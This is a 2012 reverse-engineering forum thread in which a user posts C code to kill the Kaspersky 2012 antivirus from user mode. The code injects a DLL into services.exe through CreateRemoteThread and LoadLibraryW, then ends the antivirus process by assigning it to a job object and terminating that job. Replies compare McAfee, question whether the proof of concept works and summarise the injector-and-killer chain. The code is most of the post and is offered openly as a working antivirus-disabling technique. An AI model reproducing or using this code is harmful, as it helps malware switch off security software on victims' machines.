A forum for reverse engineering, OS internals and malware analysis 

Forum for discussion about user-mode development.
 #12278  by kmd
 Fri Mar 23, 2012 6:31 am
Tigzy wrote:I don't think so, It would already be done otherwise.
what was the point then? if nothing is available
 #13915  by R00tKit
 Tue Jun 12, 2012 5:15 am
hi
conjunction to this post http://www.kernelmode.info/forum/viewto ... 85&start=0

i will show you how can kill kaspersky 2012 from user mode

its simple and stupid :
kaspersky allow injecting code inside services.exe and also it allow services.exe open handle with full Access
so what ? :lol: its developer forget hooking AssignProcessToJobObject :o :o

i inject this code into services.exe :( without any optimal )
Code: Select all
void Killkaspersky(int pid)
{
	OutputDebugString(L"inside kill\r\n");
	WCHAR f[100];
	HANDLE han=OpenProcess(PROCESS_ALL_ACCESS,NULL,pid);
	
	if (han==INVALID_HANDLE_VALUE)
	{
	OutputDebugString(L"error open");
	return ;
	}
		HANDLE jo=CreateJobObjectW(NULL,L"job");

		if(!DebugActiveProcess(1732))
		{
		 OutputDebugString(L"error debug");	return;
		}
		//else exit(0);
		if(AssignProcessToJobObject(jo,(HANDLE)han))
		{
			OutputDebugString(L"yes AssignProcessToJobObject");
			if(TerminateJobObject(jo,0))
			{
				OutputDebugString(L"yes TerminateJobObject");
			}
			else 
			{ 
				OutputDebugString(L"error TerminateJobObject");
			}	
		}
		else
		{ 
			wsprintf(f,L"Error %x\r\n",GetLastError());
			OutputDebugStringW(f);// %d",GetLastError());
		}

	
	
}
Code: Select all
BOOL InjectDll(DWORD dwPID, LPTSTR lptDll)
{
	HANDLE hProcess;
	size_t dwDllLen = 0;
	LPVOID lpMem;
	DWORD dwWriteByte;
	LPVOID lpFunc;
	HANDLE hThread;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
	if ( hProcess ){
		StringCchLength(lptDll, MAX_PATH, &dwDllLen);
		if ( dwDllLen ){
			dwDllLen = (dwDllLen + 1) * sizeof(TCHAR);
			lpMem = VirtualAllocEx(hProcess, NULL, dwDllLen, MEM_COMMIT, PAGE_READWRITE);
			if ( lpMem ){
				if ( WriteProcessMemory(hProcess, lpMem, lptDll, dwDllLen, &dwWriteByte) ){
					lpFunc = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryW");
					if ( dwWriteByte ){
						hThread = CreateRemoteThread(hProcess, FALSE, 0, (LPTHREAD_START_ROUTINE)lpFunc, lpMem, 0, NULL);
						if ( hThread )
						{
							WaitForSingleObject(hThread, INFINITE);
							CloseHandle(hThread);
							return TRUE;
						}
					}
				}
				VirtualFreeEx(hProcess, lpMem, 0, MEM_RELEASE);
			}
		}
		CloseHandle(hProcess);
	}

	return FALSE;
}
(more bug after my school exam :lol: )
have good time
 #13930  by redp
 Tue Jun 12, 2012 2:00 pm
NtCl0$e wrote:its developer forget hooking AssignProcessToJobObject :o :o
Mcafee (at least version 4.x) too (this is list of spliced functions, not SSDT hooks) :lol:
 #13943  by iSecure
 Wed Jun 13, 2012 12:41 pm
NtCl0$e

On what systems you have tested your poc?

I get access denied when i try to OpenProcess() with PROCESS_ALL_ACCESS and PID of "services.exe" process (even on XP with admin priv).
How it suppose to inject to "services.exe" then? Please clarify this... Thanks
 #14012  by Mut4nt
 Fri Jun 15, 2012 11:37 pm
nice, well , kaspersky has always been weak ... I remember the 8,9 versions, they were very easy to remove from user mode :?
 #14471  by Tigzy
 Fri Jul 06, 2012 11:55 am
So basically to sum up ?

"Injector.exe" -> injects services.exe with "killer.dll"
"killer.dll" -> Open full rights handle on kaspersky process (ui?) -> assign a dummy job to this process -> terminate the job (and consequently the process)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 13